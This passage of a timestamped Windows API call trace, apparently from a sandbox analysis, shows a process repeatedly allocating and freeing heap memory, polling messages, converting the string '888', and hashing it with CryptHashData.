hHeap=0x970000) returned 1 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0252.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.649] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f48 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0252.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0252.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0252.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0252.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0252.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0252.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0252.653] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0252.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e515f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0252.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.654] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0252.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.655] CryptHashData (hHash=0xa87310, pbData=0x2e54f48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0252.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0252.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.676] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0252.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0252.677] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0252.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0252.679] RtlAllocateHeap (HeapHandle=0x970000, 